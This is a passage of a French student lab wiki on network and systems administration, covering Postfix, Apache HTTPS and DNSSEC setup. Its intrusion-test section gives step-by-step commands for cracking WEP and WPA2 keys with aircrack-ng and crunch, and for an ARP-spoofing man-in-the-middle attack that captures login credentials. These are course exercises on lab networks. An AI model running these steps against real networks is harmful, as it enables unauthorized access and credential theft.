&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une messagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérification de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenêtre de configuration s'ouvre. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la réception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les message reçu en tapant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on reçoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que Gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoin de pouvoir recevoir les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commande &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différant care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyé le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de Gandi on reçoit un code de confirmation ainsi qu'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers Gandi a téléchargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionne pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. &lt;br /&gt;
&lt;br /&gt;
Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54018</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54018"/>
				<updated>2020-11-27T17:18:57Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Génération des clef asymétrique */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
